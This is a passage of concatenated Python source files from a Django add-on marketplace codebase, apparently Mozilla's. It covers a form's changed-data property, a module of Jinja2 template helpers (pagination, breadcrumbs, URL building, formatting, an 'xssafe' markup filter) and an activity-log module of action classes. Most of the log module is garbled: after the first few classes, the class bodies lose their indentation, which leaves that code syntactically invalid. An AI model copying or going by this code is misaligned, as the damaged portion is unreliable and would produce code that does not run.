            fieldnames = [f.name for f in Model._meta.fields]
            fields = [(name, Model._meta.get_field(name))
                      for name in changed if name in fieldnames]
            # Only translated fields need the deeper comparison.
            trans = [name for name, field in fields
                     if isinstance(field, TranslatedField)]
            # If there are translated fields, pull the model from the database
            # and do comparisons.
            if trans:
                try:
                    orig = Model.objects.get(pk=self.instance.pk)
                except Model.DoesNotExist:
                    return self._changed_data
                for field in trans:
                    # Drop fields whose translated value is actually unchanged.
                    if getattr(orig, field) == getattr(self.instance, field):
                        self._changed_data.remove(field)
        return self._changed_data
    changed_data = property(_get_changed_data)
########NEW FILE########
__FILENAME__ = helpers
import collections
import json as jsonlib
import random
import re
from operator import attrgetter
from urlparse import urljoin
from django.conf import settings
from django.core.exceptions import ObjectDoesNotExist
from django.forms import CheckboxInput
from django.template import defaultfilters
from django.utils import translation
from django.utils.encoding import smart_unicode
import caching.base as caching
import jinja2
import six
from babel.support import Format
from jingo import register, env
# Needed to make sure our own |f filter overrides jingo's one.
from jingo import helpers # noqa
from tower import ugettext as _, strip_whitespace
import amo
from amo import urlresolvers, utils
from constants.licenses import PERSONA_LICENSES_IDS
from translations.helpers import truncate
from translations.query import order_by_translation
from versions.models import License
# Yanking filters from Django.
register.filter(defaultfilters.slugify)
# Registering some utils as filters:
urlparams = register.filter(utils.urlparams)  # kept as a name for reuse below
register.filter(utils.epoch)
register.filter(utils.isotime)
register.function(dict)
register.function(utils.randslice)
@register.filter
def link(item):
    """Render *item* as an anchor to its URL, escaping its name."""
    markup = """<a href="%s">%s</a>""" % (item.get_url_path(),
                                          jinja2.escape(item.name))
    return jinja2.Markup(markup)
@register.filter
def xssafe(value):
    """
    Like |safe but for strings with interpolation.
    By using |xssafe you assert that you have written tests proving an
    XSS can't happen here.
    """
    # Marks the value as safe markup; nothing is escaped.
    return jinja2.Markup(value)
@register.filter
def babel_datetime(dt, format='medium'):
    # Locale-aware datetime formatting via Babel; '' for falsy input.
    return _get_format().datetime(dt, format=format) if dt else ''
@register.filter
def babel_date(date, format='medium'):
    # Locale-aware date formatting via Babel; '' for falsy input.
    return _get_format().date(date, format=format) if date else ''
@register.function
def locale_url(url):
    """Marketplace doesn't use locale prefixed URLs but we call this a lot."""
    # TODO: Remove uses of this in templates.
    # Intentionally a no-op: the URL is returned unchanged.
    return url
@register.inclusion_tag('includes/refinements.html')
@jinja2.contextfunction
def refinements(context, items, title, thing):
    """Inclusion tag: build the context for the refinements sidebar."""
    ctx = dict(context.items())
    ctx.update({'items': items, 'title': title, 'thing': thing})
    return ctx
@register.function
def url(viewname, *args, **kwargs):
    """Helper for Django's ``reverse`` in templates."""
    # Pop the helper-only options before reversing with the rest.
    add_prefix = kwargs.pop('add_prefix', True)
    host = kwargs.pop('host', '')
    src = kwargs.pop('src', '')
    path = urlresolvers.reverse(viewname, args=args, kwargs=kwargs,
                                add_prefix=add_prefix)
    result = '%s%s' % (host, path)
    if src:
        result = urlparams(result, src=src)
    return result
@register.function
def shared_url(viewname, addon, *args, **kwargs):
    """
    Helper specifically for addons or apps to get urls. Requires
    the viewname, addon (or app). It's assumed that we'll pass the
    slug into the args and we'll look up the right slug (addon or app)
    for you.
    Viewname should be a normal view eg: `addons.details` or `apps.details`.
    `addons.details` becomes `apps.details`, if we've passed an app, etc.
    A viewname such as `details` becomes `addons.details` or `apps.details`,
    depending on the add-on type.
    """
    # Webapps use a different slug attribute and URL namespace.
    slug = addon.app_slug if addon.is_webapp() else addon.slug
    prefix = 'apps' if addon.is_webapp() else 'addons'
    namespace, dot, latter = viewname.partition('.')
    # If `viewname` is prefixed with `addons.` but we're linking to a
    # webapp, the `viewname` magically gets prefixed with `apps.`.
    if namespace in ('addons', 'apps'):
        viewname = latter
    # Otherwise, we just slap the appropriate prefix in front of `viewname`.
    viewname = '.'.join([prefix, viewname])
    # The slug always becomes the first positional URL argument.
    return url(viewname, *([slug] + list(args)), **kwargs)
@register.filter
def paginator(pager):
    # Render the classic paginator markup for a Django page object.
    return Paginator(pager).render()
@register.filter
def impala_paginator(pager):
    # Render the Impala-style paginator template for a Django page object.
    t = env.get_template('amo/impala/paginator.html')
    return jinja2.Markup(t.render({'pager': pager}))
@register.filter
def mobile_paginator(pager):
    # Render the mobile paginator template for a Django page object.
    t = env.get_template('amo/mobile/paginator.html')
    return jinja2.Markup(t.render({'pager': pager}))
@register.filter
def mobile_impala_paginator(pager):
    # Impala-style paginator that is easier to mobilefy.
    t = env.get_template('amo/mobile/impala_paginator.html')
    return jinja2.Markup(t.render({'pager': pager}))
@register.function
def is_mobile(app):
    # True when *app* is the amo.MOBILE application constant.
    return app == amo.MOBILE
@register.function
def sidebar(app):
    """Populates the sidebar with (categories, types)."""
    # Import here to avoid a circular import with addons.models.
    from addons.models import Category
    if app is None:
        return [], []
    # We muck with query to make order_by and extra_order_by play nice.
    q = Category.objects.filter(application=app.id, weight__gte=0,
                                type=amo.ADDON_EXTENSION)
    categories = order_by_translation(q, 'name')
    # Sort by weight first, then by the translated name.
    categories.query.extra_order_by.insert(0, 'weight')
    Type = collections.namedtuple('Type', 'id name url')
    base = urlresolvers.reverse('home')
    types = [Type(99, _('Collections'), base + 'collections/')]
    return categories, sorted(types, key=lambda x: x.name)
class Paginator(object):
    """Render pagination controls for a Django ``Page`` object.

    Decorates the pager with ``page_range`` (the window of page numbers to
    display) and ``dotted_lower``/``dotted_upper`` (whether to show ellipses
    before/after the window).
    """
    def __init__(self, pager):
        self.pager = pager
        self.max = 10  # maximum number of page links to show
        # Bug fix: use floor division so span stays an int under Python 3
        # (identical result under Python 2's integer division).
        self.span = (self.max - 1) // 2
        self.page = pager.number
        self.num_pages = pager.paginator.num_pages
        self.count = pager.paginator.count
        pager.page_range = self.range()
        pager.dotted_upper = self.num_pages not in pager.page_range
        pager.dotted_lower = 1 not in pager.page_range

    def range(self):
        """Return a list of page numbers to show in the paginator."""
        page, total, span = self.page, self.num_pages, self.span
        if total < self.max:
            # Few pages: show them all.
            lower, upper = 0, total
        elif page < span + 1:
            # Near the start: pin the window to the first pages.
            lower, upper = 0, span * 2
        elif page > total - span:
            # Near the end: pin the window to the last pages.
            lower, upper = total - span * 2, total
        else:
            # Middle: center the window on the current page.
            lower, upper = page - span, page + span - 1
        return range(max(lower + 1, 1), min(total, upper) + 1)

    def render(self):
        """Render the paginator template with this pager's context."""
        c = {'pager': self.pager, 'num_pages': self.num_pages,
             'count': self.count}
        t = env.get_template('amo/paginator.html').render(c)
        return jinja2.Markup(t)
def _get_format():
    # Babel Format helper bound to the locale of the active language.
    lang = translation.get_language()
    return Format(utils.get_locale_from_lang(lang))
@register.filter
def numberfmt(num, format=None):
    # Locale-aware decimal number formatting via Babel.
    return _get_format().decimal(num, format)
@register.filter
def currencyfmt(num, currency):
    # Locale-aware currency formatting; '' when num is None.
    if num is None:
        return ''
    return _get_format().currency(num, currency)
def page_name(app=None):
    """Determine the correct page name for the given app (or no app)."""
    if not app:
        return _('Add-ons')
    return _(u'Add-ons for {0}').format(app.pretty)
@register.function
@jinja2.contextfunction
def login_link(context):
    """Build a login URL that returns the user to the current page."""
    request = context['request']
    destination = request.path
    query = request.GET.urlencode()
    if query:
        destination = '%s?%s' % (destination, query)
    return urlparams(urlresolvers.reverse('users.login'), to=destination)
@register.function
@jinja2.contextfunction
def page_title(context, title, force_webapps=False):
    """Build '<title> :: <site name>' for the current app/marketplace."""
    title = smart_unicode(title)
    if settings.APP_PREVIEW:
        base_title = _('Firefox Marketplace')
    elif context.get('WEBAPPS') or force_webapps:
        base_title = _('Firefox Marketplace')
    else:
        base_title = page_name(context['request'].APP)
    return u'%s :: %s' % (title, base_title)
@register.function
@jinja2.contextfunction
def breadcrumbs(context, items=list(), add_default=True, crumb_size=40):
    """
    show a list of breadcrumbs. If url is None, it won't be a link.
    Accepts: [(url, label)]
    """
    # NOTE: items=list() is a shared default, but it is never mutated here.
    if add_default:
        app = context['request'].APP
        crumbs = [(urlresolvers.reverse('home'), page_name(app))]
    else:
        crumbs = []
    # add user-defined breadcrumbs
    if items:
        try:
            crumbs += items
        except TypeError:
            # A single (url, label) tuple rather than a list of them.
            crumbs.append(items)
    # Truncate labels so very long names don't blow up the layout.
    crumbs = [(url, truncate(label, crumb_size)) for (url, label) in crumbs]
    c = {'breadcrumbs': crumbs}
    t = env.get_template('amo/breadcrumbs.html').render(c)
    return jinja2.Markup(t)
@register.function
@jinja2.contextfunction
def impala_breadcrumbs(context, items=list(), add_default=True, crumb_size=40):
    """
    show a list of breadcrumbs. If url is None, it won't be a link.
    Accepts: [(url, label)]
    """
    # NOTE: items=list() is a shared default, but it is never mutated here.
    if add_default:
        if context.get('WEBAPPS'):
            base_title = _('Apps Marketplace')
        else:
            base_title = page_name(context['request'].APP)
        crumbs = [(urlresolvers.reverse('home'), base_title)]
    else:
        crumbs = []
    # add user-defined breadcrumbs
    if items:
        try:
            crumbs += items
        except TypeError:
            # A single (url, label) tuple rather than a list of them.
            crumbs.append(items)
    crumbs = [(url, truncate(label, crumb_size)) for (url, label) in crumbs]
    c = {'breadcrumbs': crumbs, 'has_home': add_default}
    t = env.get_template('amo/impala/breadcrumbs.html').render(c)
    return jinja2.Markup(t)
@register.filter
def json(s):
    # Serialize to JSON. The filter name shadows the stdlib module,
    # hence the jsonlib alias at import time.
    return jsonlib.dumps(s)
@register.filter
def absolutify(url, site=None):
    """Takes a URL and prepends the SITE_URL"""
    # Anything already starting with http(s) is left untouched.
    if not url.startswith('http'):
        return urljoin(site or settings.SITE_URL, url)
    return url
@register.filter
def strip_controls(s):
    """
    Strips control characters from a string.
    """
    # Translation table of control characters.
    # Maps ASCII 0-31 to None, keeping newline (10) and carriage return (13).
    control_trans = dict((n, None) for n in xrange(32) if n not in [10, 13])
    rv = unicode(s).translate(control_trans)
    # Preserve the Markup-ness of the input.
    return jinja2.Markup(rv) if isinstance(s, jinja2.Markup) else rv
@register.filter
def strip_html(s, just_kidding=False):
    """Strips HTML. Confirm lets us opt out easily."""
    if just_kidding:
        return s
    if not s:
        return ''
    # Two passes, exactly as before: strip tags from the coerced unicode,
    # then strip anything tag-like the first pass may have exposed.
    once = re.sub(r'<.*?>', '', smart_unicode(s, errors='ignore'))
    return re.sub(r'<.*?>', '', once)
@register.filter
def external_url(url):
    """Bounce a URL off outgoing.mozilla.org."""
    # Wraps the URL with the outgoing redirector.
    return urlresolvers.get_outgoing_url(unicode(url))
@register.filter
def shuffle(sequence):
    """Shuffle a sequence."""
    # NOTE: shuffles in place and returns the same sequence object.
    random.shuffle(sequence)
    return sequence
@register.function
def license_link(license):
    """Link to a code license, including icon where applicable.

    Accepts a License object, a built-in persona license id, a custom
    License pk, or a falsy value (renders nothing).
    """
    # If passed in an integer, try to look up the License.
    if isinstance(license, (long, int)):
        if license in PERSONA_LICENSES_IDS:
            # Grab built-in license.
            license = PERSONA_LICENSES_IDS[license]
        else:
            # Grab custom license.
            license = License.objects.filter(id=license)
            if not license.exists():
                return ''
            license = license[0]
    elif not license:
        return ''
    # Custom (non-builtin) licenses get a plain label, not the template.
    if not getattr(license, 'builtin', True):
        return _('Custom License')
    t = env.get_template('amo/license_link.html').render({'license': license})
    return jinja2.Markup(t)
@register.function
def field(field, label=None, **attrs):
    """Render a form field as errors + label + widget inside a <p>."""
    if label is not None:
        field.label = label
    # HTML from Django is already escaped.
    rendered = u'%s<p>%s%s</p>' % (field.errors, field.label_tag(),
                                   field.as_widget(attrs=attrs))
    return jinja2.Markup(rendered)
@register.inclusion_tag('amo/category-arrow.html')
@jinja2.contextfunction
def category_arrow(context, key, prefix):
    """Inclusion tag: build the context for a category arrow link."""
    ctx = dict(context.items())
    ctx.update({'key': key, 'prefix': prefix})
    return ctx
@register.filter
def timesince(time):
    """Render a timestamp as a relative '... ago' string ('' for falsy)."""
    if not time:
        return u''
    # L10n: relative time in the past, like '4 days ago'
    return _(u'{0} ago').format(defaultfilters.timesince(time))
@register.inclusion_tag('amo/recaptcha.html')
@jinja2.contextfunction
def recaptcha(context, form):
    """Inclusion tag: build the context for the reCAPTCHA widget."""
    ctx = dict(context.items())
    ctx.update({'form': form})
    return ctx
@register.filter
def is_choice_field(value):
    """True if the bound field uses a checkbox widget; None if not a field."""
    try:
        widget = value.field.widget
    except AttributeError:
        # Not a bound field at all — fall through to an implicit None.
        return None
    return isinstance(widget, CheckboxInput)
@register.inclusion_tag('amo/mobile/sort_by.html')
def mobile_sort_by(base_url, options=None, selected=None, extra_sort_opts=None,
                   search_filter=None):
    # Builds the context for the mobile sort-by selector.
    # WARNING: this returns locals(), so every local variable name here
    # (base_url, options, selected, current, ...) is a template context key.
    # Do not rename locals without updating the template.
    if search_filter:
        selected = search_filter.field
        options = search_filter.opts
        if hasattr(search_filter, 'extras'):
            options += search_filter.extras
    if extra_sort_opts:
        options_dict = dict(options + extra_sort_opts)
    else:
        options_dict = dict(options)
    if selected in options_dict:
        current = options_dict[selected]
    else:
        selected, current = options[0]  # Default to the first option.
    return locals()
@register.function
@jinja2.contextfunction
def media(context, url, key='MEDIA_URL'):
    """Get a MEDIA_URL link with a cache buster querystring."""
    # An explicit BUILD_ID wins; otherwise pick the buster by file type.
    if 'BUILD_ID' in context:
        build = context['BUILD_ID']
    elif url.endswith('.js'):
        build = context['BUILD_ID_JS']
    elif url.endswith('.css'):
        build = context['BUILD_ID_CSS']
    else:
        build = context['BUILD_ID_IMG']
    return urljoin(context[key], utils.urlparams(url, b=build))
@register.function
@jinja2.contextfunction
def static(context, url):
    """Get a STATIC_URL link with a cache buster querystring."""
    # Same logic as media(), keyed on the STATIC_URL setting.
    return media(context, url, 'STATIC_URL')
@register.function
@jinja2.evalcontextfunction
def attrs(ctx, *args, **kw):
    # Render the given pairs/keywords as an XML/HTML attribute string.
    return jinja2.filters.do_xmlattr(ctx, dict(*args, **kw))
@register.function
@jinja2.contextfunction
def side_nav(context, addon_type, category=None):
    # Cached wrapper around _side_nav, keyed on app/type/category.
    app = context['request'].APP.id
    cat = str(category.id) if category else 'all'
    return caching.cached(lambda: _side_nav(context, addon_type, category),
                          'side-nav-%s-%s-%s' % (app, addon_type, cat))
def _side_nav(context, addon_type, cat):
    # Prevent helpers generating circular imports.
    from addons.models import Category, AddonType
    request = context['request']
    qs = Category.objects.filter(weight__gte=0)
    # Personas and webapps are not app-specific; everything else is.
    if addon_type not in (amo.ADDON_PERSONA, amo.ADDON_WEBAPP):
        qs = qs.filter(application=request.APP.id)
    sort_key = attrgetter('weight', 'name')
    categories = sorted(qs.filter(type=addon_type), key=sort_key)
    # Links are relative to the category page, or to the type's landing page.
    if cat:
        base_url = cat.get_url_path()
    else:
        base_url = AddonType(addon_type).get_url_path()
    ctx = dict(request=request, base_url=base_url, categories=categories,
               addon_type=addon_type, amo=amo)
    return jinja2.Markup(env.get_template('amo/side_nav.html').render(ctx))
@register.function
@jinja2.contextfunction
def site_nav(context):
    # Cached wrapper around _site_nav, keyed on the current app.
    app = context['request'].APP.id
    return caching.cached(lambda: _site_nav(context), 'site-nav-%s' % app)
def _site_nav(context):
    # Prevent helpers from generating circular imports.
    from addons.models import Category
    request = context['request']
    # Sort by weight first, then name.
    sorted_cats = lambda qs: sorted(qs, key=attrgetter('weight', 'name'))
    extensions = Category.objects.filter(application=request.APP.id,
        weight__gte=0, type=amo.ADDON_EXTENSION)
    ctx = dict(request=request, amo=amo,
               extensions=sorted_cats(extensions))
    return jinja2.Markup(env.get_template('amo/site_nav.html').render(ctx))
@register.filter
def premium_text(type):
    # Human-readable label for an ADDON_PREMIUM_TYPES constant.
    return amo.ADDON_PREMIUM_TYPES[type]
@register.function
def loc(s):
    """A noop function for strings that are not ready to be localized."""
    # Normalizes whitespace via tower's strip_whitespace, without marking
    # the string for extraction.
    return strip_whitespace(s)
@register.function
@jinja2.contextfunction
def remora_url(context, url, lang=None, app=None, prefix=''):
    """Wrapper for urlresolvers.remora_url that fills lang/app from the
    template context when not given explicitly."""
    if lang is None:
        context_lang = context['LANG']
        if context_lang:
            # remora wants dashed locales, e.g. 'pt-BR'.
            lang = translation.to_locale(context_lang).replace('_', '-')
    if app is None:
        try:
            app = context['APP'].short
        except (AttributeError, KeyError):
            # No usable APP in the context: leave app as None.
            pass
    return urlresolvers.remora_url(url=url, lang=lang, app=app, prefix=prefix)
@register.function
@jinja2.contextfunction
def hasOneToOne(context, obj, attr):
    """True if the one-to-one relation *attr* exists on *obj*."""
    try:
        getattr(obj, attr)
    except ObjectDoesNotExist:
        return False
    return True
@register.function
def no_results_amo():
    # This prints a "No results found" message. That's all. Carry on.
    t = env.get_template('amo/no_results.html').render()
    return jinja2.Markup(t)
@register.filter
def f(string, *args, **kwargs):
    """This overrides jingo.helpers.f to convert input to unicode if needed.
    This is needed because of
    https://github.com/jbalogh/jingo/pull/54#issuecomment-36728948
    """
    # Coerce bytes/other types to text before str.format to avoid
    # encode errors on non-ASCII arguments.
    if not isinstance(string, six.text_type):
        string = six.text_type(string)
    return string.format(*args, **kwargs)
########NEW FILE########
__FILENAME__ = log
from inspect import isclass
from django.conf import settings
from django.core.files.storage import get_storage_class
from celery.datastructures import AttributeDict
from tower import ugettext_lazy as _
__all__ = ('LOG', 'LOG_BY_ID', 'LOG_KEEP',)
class _LOG(object):
    # Base class for activity-log action types; subclasses define id,
    # format (a localizable message), and optionally action_class/keep.
    action_class = None
class CREATE_ADDON(_LOG):
    """Log action 1: an add-on was created."""
    id = 1
    action_class = 'add'
    format = _(u'{addon} was created.')
    keep = True
class EDIT_PROPERTIES(_LOG):
    """ Expects: addon """
    # Log action 2: an add-on's properties were edited.
    id = 2
    action_class = 'edit'
    format = _(u'{addon} properties edited.')
class EDIT_DESCRIPTIONS(_LOG):
id = 3
action_class = 'edit'
format = _(u'{addon} description edited.')
class EDIT_CATEGORIES(_LOG):
id = 4
action_class = 'edit'
format = _(u'Categories edited for {addon}.')
class ADD_USER_WITH_ROLE(_LOG):
id = 5
action_class = 'add'
format = _(u'{0.name} ({1}) added to {addon}.')
keep = True
class REMOVE_USER_WITH_ROLE(_LOG):
id = 6
action_class = 'delete'
# L10n: {0} is the user being removed, {1} is their role.
format = _(u'{0.name} ({1}) removed from {addon}.')
keep = True
class EDIT_CONTRIBUTIONS(_LOG):
id = 7
action_class = 'edit'
format = _(u'Contributions for {addon}.')
class USER_DISABLE(_LOG):
id = 8
format = _(u'{addon} disabled.')
keep = True
class USER_ENABLE(_LOG):
id = 9
format = _(u'{addon} enabled.')
keep = True
# TODO(davedash): Log these types when pages are present
class SET_PUBLIC_STATS(_LOG):
id = 10
format = _(u'Stats set public for {addon}.')
keep = True
# TODO(davedash): Log these types when pages are present
class UNSET_PUBLIC_STATS(_LOG):
id = 11
format = _(u'{addon} stats set to private.')
keep = True
class CHANGE_STATUS(_LOG):
id = 12
# L10n: {0} is the status
format = _(u'{addon} status changed to {0}.')
keep = True
class ADD_PREVIEW(_LOG):
id = 13
action_class = 'add'
format = _(u'Preview added to {addon}.')
class EDIT_PREVIEW(_LOG):
id = 14
action_class = 'edit'
format = _(u'Preview edited for {addon}.')
class DELETE_PREVIEW(_LOG):
id = 15
action_class = 'delete'
format = _(u'Preview deleted from {addon}.')
class ADD_VERSION(_LOG):
id = 16
action_class = 'add'
format = _(u'{version} added to {addon}.')
keep = True
class EDIT_VERSION(_LOG):
id = 17
action_class = 'edit'
format = _(u'{version} edited for {addon}.')
class DELETE_VERSION(_LOG):
id = 18
action_class = 'delete'
# Note, {0} is a string not a version since the version is deleted.
# L10n: {0} is the version number
format = _(u'Version {0} deleted from {addon}.')
keep = True
class ADD_FILE_TO_VERSION(_LOG):
id = 19
action_class = 'add'
format = _(u'File {0.name} added to {version} of {addon}.')
class DELETE_FILE_FROM_VERSION(_LOG):
"""
Expecting: addon, filename, version
Because the file is being deleted, filename and version
should be strings and not the object.
"""
id = 20
action_class = 'delete'
format = _(u'File {0} deleted from {version} of {addon}.')
class APPROVE_VERSION(_LOG):
id = 21
action_class = 'approve'
format = _(u'{addon} {version} approved.')
short = _(u'Approved')
keep = True
review_email_user = True
review_queue = True
class PRELIMINARY_VERSION(_LOG):
id = 42
action_class = 'approve'
format = _(u'{addon} {version} given preliminary review.')
short = _(u'Preliminarily approved')
keep = True
review_email_user = True
review_queue = True
class REJECT_VERSION(_LOG):
# takes add-on, version, reviewtype
id = 43
action_class = 'reject'
format = _(u'{addon} {version} rejected.')
short = _(u'Rejected')
keep = True
review_email_user = True
review_queue = True
class RETAIN_VERSION(_LOG):
# takes add-on, version, reviewtype
id = 22
format = _(u'{addon} {version} retained.')
short = _(u'Retained')
keep = True
review_email_user = True
review_queue = True
class ESCALATE_VERSION(_LOG):
# takes add-on, version, reviewtype
id = 23
format = _(u'{addon} {version} escalated.')
short = _(u'Escalated')
keep = True
review_email_user = True
review_queue = True
class REQUEST_VERSION(_LOG):
# takes add-on, version, reviewtype
id = 24
format = _(u'{addon} {version} review requested.')
short = _(u'Review requested')
keep = True
review_email_user = True
review_queue = True
class REQUEST_INFORMATION(_LOG):
id = 44
format = _(u'{addon} {version} more information requested.')
short = _(u'More information requested')
keep = True
review_email_user = True
review_queue = True
class REQUEST_SUPER_REVIEW(_LOG):
id = 45
format = _(u'{addon} {version} super review requested.')
short = _(u'Super review requested')
keep = True
review_queue = True
class COMMENT_VERSION(_LOG):
id = 49
format = _(u'Comment on {addon} {version}.')
short = _(u'Comment')
keep = True
review_queue = True
hide_developer = True
class ADD_TAG(_LOG):
id = 25
action_class = 'tag'
format = _(u'{tag} added to {addon}.')
class REMOVE_TAG(_LOG):
id = 26
action_class = 'tag'
format = _(u'{tag} removed from {addon}.')
class ADD_TO_COLLECTION(_LOG):
id = 27
action_class = 'collection'
format = _(u'{addon} added to {collection}.')
class REMOVE_FROM_COLLECTION(_LOG):
id = 28
action_class = 'collection'
format = _(u'{addon} removed from {collection}.')
class ADD_REVIEW(_LOG):
id = 29
action_class = 'review'
format = _(u'{review} for {addon} written.')
# TODO(davedash): Add these when we do the admin site
class ADD_RECOMMENDED_CATEGORY(_LOG):
id = 31
action_class = 'edit'
# L10n: {0} is a category name.
format = _(u'{addon} featured in {0}.')
class REMOVE_RECOMMENDED_CATEGORY(_LOG):
id = 32
action_class = 'edit'
# L10n: {0} is a category name.
format = _(u'{addon} no longer featured in {0}.')
class ADD_RECOMMENDED(_LOG):
id = 33
format = _(u'{addon} is now featured.')
keep = True
class REMOVE_RECOMMENDED(_LOG):
id = 34
format = _(u'{addon} is no longer featured.')
keep = True
class ADD_APPVERSION(_LOG):
id = 35
action_class = 'add'
# L10n: {0} is the application, {1} is the version of the app
format = _(u'{0} {1} added.')
class CHANGE_USER_WITH_ROLE(_LOG):
""" Expects: author.user, role, addon """
id = 36
# L10n: {0} is a user, {1} is their role
format = _(u'{0.name} role changed to {1} for {addon}.')
keep = True
class CHANGE_LICENSE(_LOG):
""" Expects: license, addon """
id = 37
action_class = 'edit'
format = _(u'{addon} is now licensed under {0.name}.')
class CHANGE_POLICY(_LOG):
id = 38
action_class = 'edit'
format = _(u'{addon} policy changed.')
class CHANGE_ICON(_LOG):
id = 39
action_class = 'edit'
format = _(u'{addon} icon changed.')
class APPROVE_REVIEW(_LOG):
id = 40
action_class = 'approve'
format = _(u'{review} for {addon} approved.')
editor_format = _(u'{user} approved {review} for {addon}.')
keep = True
editor_event = True
class DELETE_REVIEW(_LOG):
"""Requires review.id and add-on objects."""
id = 41
action_class = 'review'
format = _(u'Review {0} for {addon} deleted.')
editor_format = _(u'{user} deleted {0} for {addon}.')
keep = True
editor_event = True
class MAX_APPVERSION_UPDATED(_LOG):
id = 46
format = _(u'Application max version for {version} updated.')
class BULK_VALIDATION_EMAILED(_LOG):
id = 47
format = _(u'Authors emailed about compatibility of {version}.')
class BULK_VALIDATION_USER_EMAILED(_LOG):
id = 130
format = _(u'Email sent to Author about add-on compatibility.')
class CHANGE_PASSWORD(_LOG):
id = 48
format = _(u'Password changed.')
class MAKE_PREMIUM(_LOG):
id = 50
format = _(u'{addon} changed to premium.')
class MANIFEST_UPDATED(_LOG):
id = 52
format = _(u'{addon} manifest updated.')
class APPROVE_VERSION_WAITING(_LOG):
id = 53
action_class = 'approve'
format = _(u'{addon} {version} approved but waiting to be made public.')
short = _(u'Approved but waiting')
keep = True
review_email_user = True
review_queue = True
class PURCHASE_ADDON(_LOG):
id = 54
format = _(u'{addon} purchased.')
class INSTALL_ADDON(_LOG):
id = 55
format = _(u'{addon} installed.')
class REFUND_REQUESTED(_LOG):
id = 56
format = _(u'Refund requested for {addon}')
class REFUND_DECLINED(_LOG):
id = 57
format = _(u'Refund declined for {addon} for {0}.')
class REFUND_GRANTED(_LOG):
id = 58
format = _(u'Refund granted for {addon} for {0}.')
class REFUND_INSTANT(_LOG):
id = 59
format = _(u'Instant refund granted for {addon}.')
class USER_EDITED(_LOG):
id = 60
format = _(u'Account updated.')
class RECEIPT_CHECKED(_LOG):
id = 65
format = _(u'Valid receipt was checked for {addon}.')
class ESCALATION_CLEARED(_LOG):
id = 66
format = _(u'Escalation cleared for {addon}.')
short = _(u'Escalation cleared')
keep = True
review_queue = True
class APP_DISABLED(_LOG):
id = 67
format = _(u'{addon} disabled.')
short = _(u'App disabled')
keep = True
review_queue = True
class ESCALATED_HIGH_ABUSE(_LOG):
id = 68
format = _(u'{addon} escalated because of high number of abuse reports.')
short = _(u'High Abuse Reports')
keep = True
review_queue = True
class ESCALATED_HIGH_REFUNDS(_LOG):
id = 69
format = _(u'{addon} escalated because of high number of refund requests.')
short = _(u'High Refund Requests')
keep = True
review_queue = True
class REREVIEW_MANIFEST_CHANGE(_LOG):
id = 70
format = _(u'{addon} re-reviewed because of manifest change.')
short = _(u'Manifest Change')
keep = True
review_queue = True
class REREVIEW_PREMIUM_TYPE_UPGRADE(_LOG):
id = 71
format = _(u'{addon} re-reviewed because app upgraded premium type.')
short = _(u'Premium Type Upgrade')
keep = True
review_queue = True
class REREVIEW_CLEARED(_LOG):
id = 72
format = _(u'Re-review cleared for {addon}.')
short = _(u'Re-review cleared')
keep = True
review_queue = True
class ESCALATE_MANUAL(_LOG):
id = 73
format = _(u'{addon} escalated by reviewer.')
short = _(u'Reviewer escalation')
keep = True
review_queue = True
# TODO(robhudson): Escalation log for editor escalation..
class VIDEO_ERROR(_LOG):
id = 74
format = _(u'Video removed from {addon} because of a problem with '
'the video. ')
short = _(u'Video removed')
class REREVIEW_DEVICES_ADDED(_LOG):
id = 75
format = _(u'{addon} re-review because of new device(s) added.')
short = _(u'Device(s) Added')
keep = True
review_queue = True
class REVIEW_DEVICE_OVERRIDE(_LOG):
id = 76
format = _(u'{addon} device support manually changed by reviewer.')
short = _(u'Device(s) Changed by Reviewer')
keep = True
review_queue = True
class WEBAPP_RESUBMIT(_LOG):
id = 77
format = _(u'{addon} resubmitted for review.')
short = _(u'App Resubmission')
keep = True
review_queue = True
class ESCALATION_VIP_APP(_LOG):
id = 78
format = _(u'{addon} auto-escalated because its a VIP app.')
short = _(u'VIP auto-escalation')
keep = True
review_queue = True
class CUSTOM_TEXT(_LOG):
id = 98
format = '{0}'
class CUSTOM_HTML(_LOG):
id = 99
format = '{0}'
class OBJECT_ADDED(_LOG):
id = 100
format = _(u'Created: {0}.')
admin_event = True
class OBJECT_EDITED(_LOG):
id = 101
format = _(u'Edited field: {2} set to: {0}.')
admin_event = True
class OBJECT_DELETED(_LOG):
id = 102
format = _(u'Deleted: {1}.')
admin_event = True
class ADMIN_USER_EDITED(_LOG):
id = 103
format = _(u'User {user} edited, reason: {1}')
admin_event = True
class ADMIN_USER_ANONYMIZED(_LOG):
id = 104
format = _(u'User {user} anonymized.')
admin_event = True
class ADMIN_USER_RESTRICTED(_LOG):
id = 105
format = _(u'User {user} restricted.')
admin_event = True
class ADMIN_VIEWED_LOG(_LOG):
id = 106
format = _(u'Admin {0} viewed activity log for {user}.')
admin_event = True
class EDIT_REVIEW(_LOG):
id = 107
action_class = 'review'
format = _(u'{review} for {addon} updated.')
class THEME_REVIEW(_LOG):
id = 108
action_class = 'review'
format = _(u'{addon} reviewed.')
class GROUP_USER_ADDED(_LOG):
id = 120
action_class = 'access'
format = _(u'User {0.name} added to {group}.')
keep = True
admin_event = True
class GROUP_USER_REMOVED(_LOG):
id = 121
action_class = 'access'
format = _(u'User {0.name} removed from {group}.')
keep = True
admin_event = True
class REVIEW_FEATURES_OVERRIDE(_LOG):
id = 122
format = _(u'{addon} minimum requirements manually changed by reviewer.')
short = _(u'Requirements Changed by Reviewer')
keep = True
review_queue = True
class REREVIEW_FEATURES_CHANGED(_LOG):
id = 123
format = _(u'{addon} minimum requirements manually changed.')
short = _(u'Requirements Changed')
keep = True
review_queue = True
class CHANGE_VERSION_STATUS(_LOG):
id = 124
# L10n: {0} is the status
format = _(u'{version} status changed to {0}.')
keep = True
class DELETE_USER_LOOKUP(_LOG):
id = 125
# L10n: {0} is the status
format = _(u'User {0.name} {0.id} deleted via lookup tool.')
keep = True
class CONTENT_RATING_TO_ADULT(_LOG):
id = 126
format = _('{addon} content rating changed to Adult.')
review_queue = True
class CONTENT_RATING_CHANGED(_LOG):
id = 127
format = _('{addon} content rating changed.')
class PRIORITY_REVIEW_REQUESTED(_LOG):
id = 128
format = _(u'Priority review requested for {addon}.')
short = _(u'Priority Review')
keep = True
review_queue = True
# Collect every _LOG subclass defined above into the lookup structures the
# rest of the codebase uses.
LOGS = [x for x in vars().values()
        if isclass(x) and issubclass(x, _LOG) and x != _LOG]
# Numeric id -> class, and class name -> class (attribute-style access).
LOG_BY_ID = dict((l.id, l) for l in LOGS)
LOG = AttributeDict((l.__name__, l) for l in LOGS)
# Id subsets keyed off the optional class-level flags.
LOG_ADMINS = [l.id for l in LOGS if hasattr(l, 'admin_event')]
